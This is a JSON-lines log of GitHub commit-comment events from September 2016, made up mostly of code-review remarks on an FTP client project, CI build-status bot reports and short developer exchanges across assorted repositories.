{"id":"4501686758","type":"CommitCommentEvent","actor":{"login":"bska"},"repo":{"name":"OPM/ResInsight"},"payload":{"comment":{"id":18861348,"position":null,"line":null,"path":null,"commit_id":"0128baddff58ce3fc4eab843c4b00a21bfed0ce3","created_at":"2016-09-01T10:15:54Z","updated_at":"2016-09-01T10:15:54Z","body":"> Thanks for the feedback, will look into this issue as soon as possible.\r\n\r\nPlease let me know if there's anything I can do to help analyze the problem.  At the moment I have only configured a Release build without Octave, but I can set up a Debug build and run the application through a debugger too."}},"created_at":"2016-09-01T10:15:54Z"}
{"id":"4501689584","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861356,"position":8,"line":8,"path":"src/gorjan/test/connection/ConnectionDetails.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:16:34Z","updated_at":"2016-09-01T10:16:34Z","body":"Consider appropriate encapsulation with non-static members."}},"created_at":"2016-09-01T10:16:34Z"}
{"id":"4501690739","type":"CommitCommentEvent","actor":{"login":"mafintosh"},"repo":{"name":"mafintosh/k-rpc"},"payload":{"comment":{"id":18861359,"position":5,"line":12,"path":"package.json","commit_id":"f23037a9be7b29de476faf01fbeb3cc277e8bad3","created_at":"2016-09-01T10:16:50Z","updated_at":"2016-09-01T10:16:50Z","body":"why is this needed?"}},"created_at":"2016-09-01T10:16:50Z"}
{"id":"4501691169","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861360,"position":14,"line":14,"path":"src/gorjan/test/connection/ConnectionDetails.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:16:56Z","updated_at":"2016-09-01T10:16:56Z","body":"Should at least be private and have acc + mut methods"}},"created_at":"2016-09-01T10:16:56Z"}
{"id":"4501691353","type":"CommitCommentEvent","actor":{"login":"gaganslinfy"},"repo":{"name":"gaganslinfy/first_repo"},"payload":{"comment":{"id":18861362,"position":6,"line":18,"path":"hello.php","commit_id":"aacb6bcacf28c38e84264174d2270e57a908d053","created_at":"2016-09-01T10:16:58Z","updated_at":"2016-09-01T10:16:58Z","body":"pending"}},"created_at":"2016-09-01T10:16:58Z"}
{"id":"4501691539","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861363,"position":15,"line":15,"path":"src/gorjan/test/connection/ConnectionDetails.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:17:01Z","updated_at":"2016-09-01T10:17:01Z","body":"ditto"}},"created_at":"2016-09-01T10:17:01Z"}
{"id":"4501692084","type":"CommitCommentEvent","actor":{"login":"Shreeshrii"},"repo":{"name":"tesseract-ocr/tesseract"},"payload":{"comment":{"id":18861364,"position":null,"line":null,"path":null,"commit_id":"b14f7353abe600948780c23dd83491fd4a132f22","created_at":"2016-09-01T10:17:07Z","updated_at":"2016-09-01T10:17:07Z","body":"If both osd and eng trained data are Required to be downloaded by user, does it not make sense to include both of these as part of tesseract base package."}},"created_at":"2016-09-01T10:17:07Z"}
{"id":"4501693449","type":"CommitCommentEvent","actor":{"login":"YiJunKim"},"repo":{"name":"YiJunKim/component"},"payload":{"comment":{"id":18861370,"position":null,"line":null,"path":null,"commit_id":"1777157adcfc933bf8ae53c49e49076bbd58ba3e","created_at":"2016-09-01T10:17:28Z","updated_at":"2016-09-01T10:17:28Z","body":"수고했어 이준군 하하하하"}},"created_at":"2016-09-01T10:17:28Z"}
{"id":"4501693949","type":"CommitCommentEvent","actor":{"login":"projectkk2glider"},"repo":{"name":"opentx/opentx"},"payload":{"comment":{"id":18861372,"position":null,"line":null,"path":null,"commit_id":"4221bfdf7473622a64b8c96b58a223c1dcbfd44f","created_at":"2016-09-01T10:17:35Z","updated_at":"2016-09-01T10:17:35Z","body":":+1: "}},"created_at":"2016-09-01T10:17:35Z"}
{"id":"4501694017","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861373,"position":21,"line":21,"path":"src/gorjan/test/connection/ConnectionDetails.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:17:36Z","updated_at":"2016-09-01T10:17:36Z","body":"Consider extracting into static variables instead of having it hardcoded. Also, might be worth passing in as arguments"}},"created_at":"2016-09-01T10:17:36Z"}
{"id":"4501695291","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861377,"position":22,"line":22,"path":"src/gorjan/test/connection/ConnectionDetails.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:17:53Z","updated_at":"2016-09-01T10:17:53Z","body":"ditto"}},"created_at":"2016-09-01T10:17:53Z"}
{"id":"4501695645","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861379,"position":23,"line":23,"path":"src/gorjan/test/connection/ConnectionDetails.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:17:58Z","updated_at":"2016-09-01T10:17:58Z","body":"ditto"}},"created_at":"2016-09-01T10:17:58Z"}
{"id":"4501696337","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18861382,"position":null,"line":null,"path":null,"commit_id":"ee02cc0befbab1dc6207e8dda177184f9d5750b3","created_at":"2016-09-01T10:18:08Z","updated_at":"2016-09-01T10:18:08Z","body":"113835831-Source-Temp-Not-Reporting (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (2332 of 2333 tests passed, 24 test warnings)\n\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee02cc0befbab1dc6207e8dda177184f9d5750b3-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee02cc0befbab1dc6207e8dda177184f9d5750b3-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-01T10:18:08Z"}
{"id":"4501698982","type":"CommitCommentEvent","actor":{"login":"TheDiamondYT1"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18861386,"position":null,"line":null,"path":null,"commit_id":"0a08eee5711256319f9b72a4245f92b2f51af590","created_at":"2016-09-01T10:18:43Z","updated_at":"2016-09-01T10:18:43Z","body":"@dktapps You should make the console one into pages but make it quite long pages.\r\n\r\nI dont even know why im suggestion this Genidys is bs cuz pocketmine is bs and nukkit is bs cuz its a copy of pocketmine"}},"created_at":"2016-09-01T10:18:43Z"}
{"id":"4501701641","type":"CommitCommentEvent","actor":{"login":"Maxie01"},"repo":{"name":"Maxie01/Theme-Patch"},"payload":{"comment":{"id":18861398,"position":null,"line":null,"path":null,"commit_id":"7ddf9b65c1c33144f99743141ddf23e2beabe0b0","created_at":"2016-09-01T10:19:19Z","updated_at":"2016-09-01T10:19:19Z","body":"What i fixed: http://i.imgur.com/LM8fxWH.png"}},"created_at":"2016-09-01T10:19:19Z"}
{"id":"4501708029","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18861439,"position":null,"line":null,"path":null,"commit_id":"fa76e9b0149285d3887d8dac163b5153555af458","created_at":"2016-09-01T10:20:43Z","updated_at":"2016-09-01T10:20:43Z","body":"EP-6-6 (macumber) - i386-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa76e9b0149285d3887d8dac163b5153555af458-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa76e9b0149285d3887d8dac163b5153555af458-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-01T10:20:43Z"}
{"id":"4501708313","type":"CommitCommentEvent","actor":{"login":"flo"},"repo":{"name":"Terasology/StructureTemplates"},"payload":{"comment":{"id":18861440,"position":29,"line":29,"path":"src/main/java/org/terasology/structureTemplates/internal/components/LayeredStructureComponent.java","commit_id":"7cf90d7ba99b335b85d41eb91ec42da04384263a","created_at":"2016-09-01T10:20:47Z","updated_at":"2016-09-01T10:20:47Z","body":"Since BlockToPlace has a Vector3i position, you can have layers have any amount of y gap even if they are right behind each other in the list. You can even have a layer describe a complete wall / build step.\r\n\r\nActually the question is if we should even name it \"Layer\" or if we want to name it \"BuildStep\" or something like that, to give the users more creativity. e.g. for a house maybe first some wood bars get placed in the first BuildStep/Layer, then the gaps between the wood bars get filled to create walls in the second step. and then a third step adds a roof."}},"created_at":"2016-09-01T10:20:47Z"}
{"id":"4501711501","type":"CommitCommentEvent","actor":{"login":"Null45"},"repo":{"name":"davideas/FlexibleAdapter"},"payload":{"comment":{"id":18861451,"position":null,"line":null,"path":null,"commit_id":"04a6f07ab9a9cc5e9a1e3811a35208deaa405ab7","created_at":"2016-09-01T10:21:32Z","updated_at":"2016-09-01T10:21:32Z","body":"https://play.google.com/store/apps/details?id=ru.beward.bnvr using that awesome lib too. Add it if you want"}},"created_at":"2016-09-01T10:21:32Z"}
{"id":"4501715653","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861460,"position":36,"line":36,"path":"src/gorjan/test/connection/ConnectionDetails.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:22:30Z","updated_at":"2016-09-01T10:22:30Z","body":"This is pretty inflexible - the argument sequence in arg list should not be relevant.\r\n\r\nConsider parsing each argument as a separate entity"}},"created_at":"2016-09-01T10:22:30Z"}
{"id":"4501716164","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861461,"position":41,"line":41,"path":"src/gorjan/test/connection/ConnectionDetails.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:22:37Z","updated_at":"2016-09-01T10:22:37Z","body":"logging please"}},"created_at":"2016-09-01T10:22:37Z"}
{"id":"4501722077","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861479,"position":64,"line":64,"path":"src/gorjan/test/connection/ConnectionDetails.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:23:58Z","updated_at":"2016-09-01T10:23:58Z","body":"Generally it's a good idea to check the input for validity and throw an exception with a descriptive message in case of an illegal argument value - i.e. not conforming to the expected input"}},"created_at":"2016-09-01T10:23:58Z"}
{"id":"4501722836","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":18861481,"position":null,"line":null,"path":null,"commit_id":"d78d515acb04a3bfbf0f1dca125fbb2756cbbe9d","created_at":"2016-09-01T10:24:09Z","updated_at":"2016-09-01T10:24:09Z","body":"@ramapcsx2 @refractionpcsx2 did you try to use it ?"}},"created_at":"2016-09-01T10:24:09Z"}
{"id":"4501723532","type":"CommitCommentEvent","actor":{"login":"GOA2000"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861483,"position":13,"line":13,"path":"src/gorjan/test/FTPClientMain.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:24:17Z","updated_at":"2016-09-01T10:24:17Z","body":"There are certain parameters in currentConnection which apply to all connections."}},"created_at":"2016-09-01T10:24:17Z"}
{"id":"4501724874","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861486,"position":65,"line":65,"path":"src/gorjan/test/connection/ConnectionDetails.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:24:36Z","updated_at":"2016-09-01T10:24:36Z","body":"once the input is checked, you can just trim the first and the last char in the string instead of doing index of"}},"created_at":"2016-09-01T10:24:36Z"}
{"id":"4501726364","type":"CommitCommentEvent","actor":{"login":"GOA2000"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861490,"position":22,"line":22,"path":"src/gorjan/test/FTPClientMain.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:24:56Z","updated_at":"2016-09-01T10:24:56Z","body":"Agreed"}},"created_at":"2016-09-01T10:24:56Z"}
{"id":"4501727172","type":"CommitCommentEvent","actor":{"login":"chiouchu"},"repo":{"name":"chiouchu/serverless-survey-forms"},"payload":{"comment":{"id":18861492,"position":null,"line":null,"path":null,"commit_id":"25d7b32144c66142ce6fb6cbcc5fb7e68eba5233","created_at":"2016-09-01T10:25:09Z","updated_at":"2016-09-01T10:25:09Z","body":"Normalizr is used to handle repeated and deep json data. So I choose Immutable.js (https://facebook.github.io/immutable-js/) to handle my json.\r\n\r\n#1 "}},"created_at":"2016-09-01T10:25:09Z"}
{"id":"4501730173","type":"CommitCommentEvent","actor":{"login":"nanego"},"repo":{"name":"nanego/redmine_multiprojects_issue"},"payload":{"comment":{"id":18861503,"position":null,"line":null,"path":null,"commit_id":"367aa63b4982cc2d73239d016fc7f77c1bb7d700","created_at":"2016-09-01T10:25:50Z","updated_at":"2016-09-01T10:25:50Z","body":"Thanks for reporting this.\r\nI have added some tags to specify which version of the plugin should be used, according to your current Redmine version.\r\n\r\nWhen you are running Redmine 3.2 or an older version, you can use the version tagged as v0.2 https://github.com/nanego/redmine_multiprojects_issue/releases/tag/v0.2"}},"created_at":"2016-09-01T10:25:50Z"}
{"id":"4501731558","type":"CommitCommentEvent","actor":{"login":"LuRsT"},"repo":{"name":"2degrees/twapi-connection"},"payload":{"comment":{"id":18861507,"position":13,"line":185,"path":"twapi_connection/__init__.py","commit_id":"65e9020f05171ec12276160df820382fd087992e","created_at":"2016-09-01T10:26:09Z","updated_at":"2016-09-01T10:26:09Z","body":"![hawkward](http://media.tumblr.com/tumblr_m63vd5EW2I1qly8of.jpg)"}},"created_at":"2016-09-01T10:26:09Z"}
{"id":"4501731769","type":"CommitCommentEvent","actor":{"login":"Reinmar"},"repo":{"name":"ckeditor/ckeditor5-utils"},"payload":{"comment":{"id":18861509,"position":7,"line":13,"path":"tests/unicode.js","commit_id":"574874e7aa3e3b4bb8cc11ed5e54ad7aed84c864","created_at":"2016-09-01T10:26:11Z","updated_at":"2016-09-01T10:26:11Z","body":"Is this Babel's behaviour a bug? Shouldn't we report it?"}},"created_at":"2016-09-01T10:26:11Z"}
{"id":"4501732321","type":"CommitCommentEvent","actor":{"login":"cmb69"},"repo":{"name":"php/web-bugs"},"payload":{"comment":{"id":18861511,"position":null,"line":null,"path":null,"commit_id":"b175427afc753135fc7a9f648f03af45529b564f","created_at":"2016-09-01T10:26:17Z","updated_at":"2016-09-01T10:26:17Z","body":"Hi Kalle!\r\n\r\nWindows (binary) snapshots are available via <http://windows.php.net/downloads/snaps/>."}},"created_at":"2016-09-01T10:26:17Z"}
{"id":"4501733411","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861514,"position":67,"line":67,"path":"src/gorjan/test/connection/ConnectionDetails.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:26:30Z","updated_at":"2016-09-01T10:26:30Z","body":"this needs more explanation (comments) - the idea is not to have a magic piece of code that produces a magic value "}},"created_at":"2016-09-01T10:26:30Z"}
{"id":"4501734570","type":"CommitCommentEvent","actor":{"login":"Jako"},"repo":{"name":"Jako/multiTV"},"payload":{"comment":{"id":18861517,"position":null,"line":null,"path":null,"commit_id":"ddfe6fb89db94b50006e7b52338e1b8f5402476f","created_at":"2016-09-01T10:26:45Z","updated_at":"2016-09-01T10:26:45Z","body":"It is now."}},"created_at":"2016-09-01T10:26:45Z"}
{"id":"4501736683","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861519,"position":27,"line":27,"path":"src/gorjan/test/connection/SocketConnection.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:27:16Z","updated_at":"2016-09-01T10:27:16Z","body":"No need for setting the private members to null  - this is automagically done during object initialization anyways"}},"created_at":"2016-09-01T10:27:16Z"}
{"id":"4501738844","type":"CommitCommentEvent","actor":{"login":"harttle"},"repo":{"name":"harttle/pm2-notify"},"payload":{"comment":{"id":18861525,"position":23,"line":114,"path":"index.js","commit_id":"c8811021a8878656f62401363a97a45ae10c9f46","created_at":"2016-09-01T10:27:48Z","updated_at":"2016-09-01T10:27:48Z","body":"See this: 6cf83537130cd3792d20cbcffa489fa4b2f91795"}},"created_at":"2016-09-01T10:27:48Z"}
{"id":"4501738881","type":"CommitCommentEvent","actor":{"login":"cmb69"},"repo":{"name":"php/web-bugs"},"payload":{"comment":{"id":18861526,"position":null,"line":null,"path":null,"commit_id":"b175427afc753135fc7a9f648f03af45529b564f","created_at":"2016-09-01T10:27:48Z","updated_at":"2016-09-01T10:27:48Z","body":"Ah, you've already noticed. :-)"}},"created_at":"2016-09-01T10:27:48Z"}
{"id":"4501739750","type":"CommitCommentEvent","actor":{"login":"hxim"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18861528,"position":null,"line":null,"path":null,"commit_id":"911b45d1dc53947a25edf764e45cd92d8ef45bd3","created_at":"2016-09-01T10:28:00Z","updated_at":"2016-09-01T10:28:00Z","body":"I believe \"1667\" can be put into QuadraticOurs array. Look at my similar attempt to this one which failed at LTC back in May 2015.\r\nhttps://github.com/hxim/Stockfish/compare/cc54a91...0b4beda"}},"created_at":"2016-09-01T10:28:00Z"}
{"id":"4501740424","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861530,"position":43,"line":43,"path":"src/gorjan/test/connection/SocketConnection.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:28:11Z","updated_at":"2016-09-01T10:28:11Z","body":"Check for null"}},"created_at":"2016-09-01T10:28:11Z"}
{"id":"4501740858","type":"CommitCommentEvent","actor":{"login":"maxbarnas"},"repo":{"name":"ckeditor/ckeditor5-utils"},"payload":{"comment":{"id":18861531,"position":7,"line":13,"path":"tests/unicode.js","commit_id":"574874e7aa3e3b4bb8cc11ed5e54ad7aed84c864","created_at":"2016-09-01T10:28:17Z","updated_at":"2016-09-01T10:28:17Z","body":"I would name it \"too eager transpilation\". But if they didn't meant to replace every `'\\uXXXX'` with actual characters, then it is a bug."}},"created_at":"2016-09-01T10:28:17Z"}
{"id":"4501741850","type":"CommitCommentEvent","actor":{"login":"kozmaz87"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18861535,"position":null,"line":null,"path":null,"commit_id":"f9586715848cd33bbe7bf8806e9c09aa9d2bdfd0","created_at":"2016-09-01T10:28:30Z","updated_at":"2016-09-01T10:28:30Z","body":"nice explanation."}},"created_at":"2016-09-01T10:28:30Z"}
{"id":"4501742572","type":"CommitCommentEvent","actor":{"login":"soyuka"},"repo":{"name":"harttle/pm2-notify"},"payload":{"comment":{"id":18861536,"position":23,"line":114,"path":"index.js","commit_id":"c8811021a8878656f62401363a97a45ae10c9f46","created_at":"2016-09-01T10:28:41Z","updated_at":"2016-09-01T10:28:41Z","body":"Oh indeed, you mean if the polling > error throw timing. Yeah indeed, this might be an issue. Nvm, I did this code as a proof of concept, glad you're forking it :). "}},"created_at":"2016-09-01T10:28:41Z"}
{"id":"4501745304","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861545,"position":60,"line":60,"path":"src/gorjan/test/connection/SocketConnection.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:29:20Z","updated_at":"2016-09-01T10:29:20Z","body":"Unclear. Why iterate 99 - 10069 is unclear from code - more explanation needed here"}},"created_at":"2016-09-01T10:29:20Z"}
{"id":"4501746827","type":"CommitCommentEvent","actor":{"login":"zdenop"},"repo":{"name":"tesseract-ocr/tesseract"},"payload":{"comment":{"id":18861554,"position":null,"line":null,"path":null,"commit_id":"b14f7353abe600948780c23dd83491fd4a132f22","created_at":"2016-09-01T10:29:39Z","updated_at":"2016-09-01T10:29:39Z","body":"@Shreeshrii: leptonica is also must for tesseract and we do not included it to tesseract library.  ;-)"}},"created_at":"2016-09-01T10:29:39Z"}
{"id":"4501747119","type":"CommitCommentEvent","actor":{"login":"nalla"},"repo":{"name":"git-for-windows/git"},"payload":{"comment":{"id":18861556,"position":null,"line":null,"path":null,"commit_id":"c465e1108af1b3d65a47d06f1ca4af7bfe8ad629","created_at":"2016-09-01T10:29:43Z","updated_at":"2016-09-01T10:29:43Z","body":"@dscho Is this `rebase -i` rewrite windows only for the time being? Are you planning to add this upstream as well?"}},"created_at":"2016-09-01T10:29:43Z"}
{"id":"4501747138","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861558,"position":79,"line":79,"path":"src/gorjan/test/connection/SocketConnection.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:29:44Z","updated_at":"2016-09-01T10:29:44Z","body":"you might check if socket is closed too"}},"created_at":"2016-09-01T10:29:44Z"}
{"id":"4501749465","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861563,"position":83,"line":83,"path":"src/gorjan/test/connection/SocketConnection.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:30:19Z","updated_at":"2016-09-01T10:30:19Z","body":"you should move EOL to static final"}},"created_at":"2016-09-01T10:30:19Z"}
{"id":"4501749996","type":"CommitCommentEvent","actor":{"login":"godblesslorry"},"repo":{"name":"godblesslorry/lorry-react-native"},"payload":{"comment":{"id":18861567,"position":5,"line":4,"path":"1-开发环境.md","commit_id":"3d323f70e2158cc4702e5500aaa599a51b8578a1","created_at":"2016-09-01T10:30:26Z","updated_at":"2016-09-01T10:30:26Z","body":"fix"}},"created_at":"2016-09-01T10:30:26Z"}
{"id":"4501751058","type":"CommitCommentEvent","actor":{"login":"godblesslorry"},"repo":{"name":"godblesslorry/lorry-react-native"},"payload":{"comment":{"id":18861568,"position":5,"line":4,"path":"1-开发环境.md","commit_id":"3d323f70e2158cc4702e5500aaa599a51b8578a1","created_at":"2016-09-01T10:30:39Z","updated_at":"2016-09-01T10:30:39Z","body":"fix"}},"created_at":"2016-09-01T10:30:39Z"}
{"id":"4501752151","type":"CommitCommentEvent","actor":{"login":"GOA2000"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861572,"position":36,"line":36,"path":"src/gorjan/test/connection/ConnectionDetails.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:30:54Z","updated_at":"2016-09-01T10:30:54Z","body":"As per request of the test the sequence is mandatory"}},"created_at":"2016-09-01T10:30:54Z"}
{"id":"4501754064","type":"CommitCommentEvent","actor":{"login":"GOA2000"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861575,"position":64,"line":64,"path":"src/gorjan/test/connection/ConnectionDetails.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:31:21Z","updated_at":"2016-09-01T10:31:21Z","body":"Agreed\r\n"}},"created_at":"2016-09-01T10:31:21Z"}
{"id":"4501756769","type":"CommitCommentEvent","actor":{"login":"GOA2000"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861584,"position":67,"line":67,"path":"src/gorjan/test/connection/ConnectionDetails.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:31:59Z","updated_at":"2016-09-01T10:31:59Z","body":"This FTP specific how to calculate upload port. Agreed Commenting to proceed"}},"created_at":"2016-09-01T10:31:59Z"}
{"id":"4501758719","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18861586,"position":163,"line":208,"path":"src/main/java/com/softserverinc/edu/controllers/ProjectController.java","commit_id":"4df7820c9b5cb9ef48e81fad59f6fcc666751d31","created_at":"2016-09-01T10:32:26Z","updated_at":"2016-09-01T10:32:26Z","body":"don't need introduce variable\r\n"}},"created_at":"2016-09-01T10:32:26Z"}
{"id":"4501761369","type":"CommitCommentEvent","actor":{"login":"potego"},"repo":{"name":"potego/hello"},"payload":{"comment":{"id":18861593,"position":null,"line":null,"path":null,"commit_id":"69196034ff725cc187c34dad95ce6f6e7d455947","created_at":"2016-09-01T10:33:05Z","updated_at":"2016-09-01T10:33:05Z","body":"hey Potego... On line 8, What are the dots for?"}},"created_at":"2016-09-01T10:33:05Z"}
{"id":"4501763964","type":"CommitCommentEvent","actor":{"login":"vatsona"},"repo":{"name":"vatsona/Hillel-FE-Basic"},"payload":{"comment":{"id":18861600,"position":null,"line":null,"path":null,"commit_id":"86c2321ee32fe646f092ef873a5fdc024069663c","created_at":"2016-09-01T10:33:40Z","updated_at":"2016-09-01T10:33:40Z","body":"Понял, хорошо!"}},"created_at":"2016-09-01T10:33:40Z"}
{"id":"4501764433","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18861601,"position":195,"line":240,"path":"src/main/java/com/softserverinc/edu/controllers/ProjectController.java","commit_id":"4df7820c9b5cb9ef48e81fad59f6fcc666751d31","created_at":"2016-09-01T10:33:48Z","updated_at":"2016-09-01T10:33:48Z","body":"this above all calculation logic should be moved in some service, because Controller shouldn't be responsible of doing this"}},"created_at":"2016-09-01T10:33:48Z"}
{"id":"4501765005","type":"CommitCommentEvent","actor":{"login":"refractionpcsx2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":18861602,"position":null,"line":null,"path":null,"commit_id":"d78d515acb04a3bfbf0f1dca125fbb2756cbbe9d","created_at":"2016-09-01T10:33:55Z","updated_at":"2016-09-01T10:33:55Z","body":"I didn't try it no, I think rama might have but it didn't work (probably because you've commented it out).  Then again I'm not sure if his repo was up to date."}},"created_at":"2016-09-01T10:33:55Z"}
{"id":"4501766292","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861604,"position":236,"line":236,"path":"src/gorjan/test/connection/SocketConnection.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:34:14Z","updated_at":"2016-09-01T10:34:14Z","body":"formatting"}},"created_at":"2016-09-01T10:34:14Z"}
{"id":"4501766938","type":"CommitCommentEvent","actor":{"login":"GOA2000"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861606,"position":65,"line":65,"path":"src/gorjan/test/connection/ConnectionDetails.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:34:24Z","updated_at":"2016-09-01T10:34:24Z","body":"The response Usualy does not begin with  and end with \"(\" ,\")\"  Depends on the configuration of server but  the brackets are mandatory"}},"created_at":"2016-09-01T10:34:24Z"}
{"id":"4501770795","type":"CommitCommentEvent","actor":{"login":"GOA2000"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861610,"position":43,"line":43,"path":"src/gorjan/test/connection/SocketConnection.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:35:16Z","updated_at":"2016-09-01T10:35:16Z","body":"Check the file for null I/0? "}},"created_at":"2016-09-01T10:35:16Z"}
{"id":"4501771201","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861611,"position":248,"line":248,"path":"src/gorjan/test/connection/SocketConnection.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:35:22Z","updated_at":"2016-09-01T10:35:22Z","body":"magic number (4096) - do extract into static final"}},"created_at":"2016-09-01T10:35:22Z"}
{"id":"4501772893","type":"CommitCommentEvent","actor":{"login":"davork"},"repo":{"name":"GOA2000/FTPClient"},"payload":{"comment":{"id":18861616,"position":251,"line":251,"path":"src/gorjan/test/connection/SocketConnection.java","commit_id":"09b551a131d82d8d3f18b752f43f3cf5e2b6622d","created_at":"2016-09-01T10:35:45Z","updated_at":"2016-09-01T10:35:45Z","body":"no need for boxed types (Long) where one can use primitive (long)\r\n"}},"created_at":"2016-09-01T10:35:45Z"}
